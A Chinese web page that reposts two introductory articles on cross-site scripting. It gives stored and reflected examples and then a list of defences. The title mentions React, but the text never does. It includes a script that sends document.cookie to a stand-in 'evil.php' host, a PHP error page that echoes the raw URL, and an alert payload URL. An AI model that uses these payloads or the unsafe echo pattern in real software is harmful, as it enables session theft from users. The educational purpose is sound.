淺談 React 中的 XSS 攻擊

者：陳吉

轉(zhuǎn)發(fā)鏈接：https://mp.weixin.qq.com/s/HweEFh78WXLawyQr_Vsl5g

ss攻擊的全稱是Cross-Site Scripting (XSS)攻擊，是一種注入式攻擊。基本的做法是把惡意代碼注入到目標(biāo)網(wǎng)站。由于瀏覽器在打開目標(biāo)網(wǎng)站的時候并不知道哪些腳本是惡意的，所以瀏覽器會無差別執(zhí)行惡意腳本，從而導(dǎo)致用戶信息和一些敏感信息被盜取和泄漏。

xss一般分為兩種類型，持久化的xss和非持久化的xss。

持久化xss

下面這個例子演示了攻擊者如何通過注入惡意代碼去盜取用戶的cookie的。

假設(shè)攻擊者在某個論壇發(fā)了個帖子，在帖子里包含了如下的惡意代碼

<SCRIPT type="text/javascript">var adr = '../evil.php?cakemonster=' + escape(document.cookie);</SCRIPT>

那么其他用戶在瀏覽這個帖子的時候，上面的代碼就會被瀏覽器執(zhí)行，從而將用戶的cookie信息發(fā)送到了/evil.php?，這個攻擊者搭建的惡意站點。由于cookie里包含了用戶的一些登錄態(tài)和敏感信息，所以訪問這個帖子的用戶會面臨被盜號的風(fēng)險。

還原一下這次攻擊的過程

攻擊者在論壇發(fā)了包含惡意代碼的帖子
一般來說這個帖子的內(nèi)容會保存在數(shù)據(jù)庫里(持久化)
攻擊者誘導(dǎo)其他用戶去訪問這個帖子
其他用戶訪問該帖子時網(wǎng)站后臺會從數(shù)據(jù)庫里讀取帖子的內(nèi)容并發(fā)送給瀏覽器
瀏覽器渲染帖子的內(nèi)容時執(zhí)行了惡意腳本
惡意腳本將用戶的cookie偷偷發(fā)送給惡意網(wǎng)站evil.php

非持久化的xss

上面的例子攻擊代碼持久化在了數(shù)據(jù)庫里，非持久化的攻擊則不需要這樣，看下面的例子。

假設(shè)我們有這樣的一個錯誤頁面，用php實現(xiàn)的

<html>
<body><? phpprint "Not found: " . urldecode($_SERVER["REQUEST_URI"]);?></body>
</html>

當(dāng)用戶訪問的頁面不存在時候，上面的頁面會自動加載，并且print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);這一行會打印出不存在頁面的具體url。

舉個例子，當(dāng)用戶訪問www.example.com/page_missing頁面時，由于page_missing頁面不存在，所以example.com會自動跳轉(zhuǎn)到page_missing路徑，并在頁面上打印出Not found: page_missing字符串。

如果攻擊者構(gòu)造了這樣一個鏈接，誘導(dǎo)用戶訪問http://wwww.example.com/<script>alert("TEST");</script>，那么普通用戶訪問該鏈接時，因為/<script>alert("TEST");</script>會被打印在頁面上并當(dāng)作普通腳本執(zhí)行，這樣一來，如果攻擊者構(gòu)造的腳本里包含獲取用戶敏感信息的代碼，那么用戶的信息將被泄漏。

還原一下這次攻擊的過程

攻擊者構(gòu)造http://wwww.example.com/<script>alert("TEST");</script>鏈接，引誘普通用戶訪問
普通用戶訪問后，跳轉(zhuǎn)到錯誤頁面
錯誤頁面會執(zhí)行惡意腳本，造成用戶信息泄漏

總結(jié)

xss攻擊是目前最常見的web攻擊形式，大家可以通過上面的例子管中窺豹一下，其核心的攻擊方式是惡意代碼注入，瀏覽器將注入的代碼當(dāng)成普通腳本正常執(zhí)行。

作者：西邊人

西說測試專欄作者

站腳本攻擊（Cross-Site Scripting，XSS）是一種常見的網(wǎng)絡(luò)安全漏洞，攻擊者通過在受信任的網(wǎng)頁中注入惡意腳本，從而在用戶的瀏覽器中執(zhí)行該惡意腳本。

XSS 攻擊的一般過程如下：

攻擊者找到一個存在 XSS 漏洞的網(wǎng)站，通常是用戶輸入的地方，如搜索框、評論區(qū)等。
攻擊者在輸入框中注入惡意的腳本代碼，這些代碼可以是 JavaScript、HTML 或其他客戶端腳本語言。
用戶訪問了包含惡意腳本的網(wǎng)頁。
用戶的瀏覽器解析網(wǎng)頁時會執(zhí)行惡意腳本，攻擊者可以利用這些腳本進(jìn)行各種惡意操作，如竊取用戶的敏感信息、劫持用戶的會話、修改網(wǎng)頁內(nèi)容等。

XSS 攻擊可以分為以下幾種類型：

存儲型 XSS：惡意腳本被存儲在服務(wù)器上，當(dāng)用戶請求包含惡意腳本的頁面時，腳本會從服務(wù)器上被取回并執(zhí)行。
反射型 XSS：惡意腳本作為 URL 參數(shù)被發(fā)送到服務(wù)器，服務(wù)器將腳本插入到響應(yīng)中并返回給用戶，用戶的瀏覽器解析并執(zhí)行該腳本。
DOM 型 XSS：惡意腳本通過修改網(wǎng)頁的 DOM 結(jié)構(gòu)來執(zhí)行攻擊，不涉及服務(wù)器的參與。

為了防止 XSS 攻擊，可以采取以下幾種措施：

輸入驗證與過濾：對用戶輸入的數(shù)據(jù)進(jìn)行驗證和過濾，確保只接受合法的輸入數(shù)據(jù)。
輸出編碼：在將用戶輸入的數(shù)據(jù)展示到網(wǎng)頁上時，對特殊字符進(jìn)行轉(zhuǎn)義，確保將其作為純文本顯示而不會被解析為腳本。
使用 HTTP-only Cookie：將敏感信息存儲在 HTTP-only Cookie 中，防止惡意腳本竊取用戶的身份驗證憑據(jù)。
Content Security Policy（CSP）：通過設(shè)置合適的 CSP，限制網(wǎng)頁中可以加載和執(zhí)行的資源，防止惡意腳本的注入。
安全的開發(fā)實踐：開發(fā)人員應(yīng)該遵循安全的編碼和開發(fā)實踐，包括輸入驗證、輸出編碼、最小權(quán)限原則等。

通過綜合采取這些安全措施，可以有效地減少 XSS 攻擊的風(fēng)險，保護(hù)用戶的數(shù)據(jù)安全和隱私。

在線咨詢

上一篇：HTML5 的調(diào)用攝像頭拍照和獲取視頻流的方法
下一篇：分享6個超實用的免費黑科技網(wǎng)站

您的項目需求

*請認(rèn)真填寫需求信息，我們會在24小時內(nèi)與您取得聯(lián)系。

整合營銷服務(wù)商

淺談 React 中的 XSS 攻擊

您的項目需求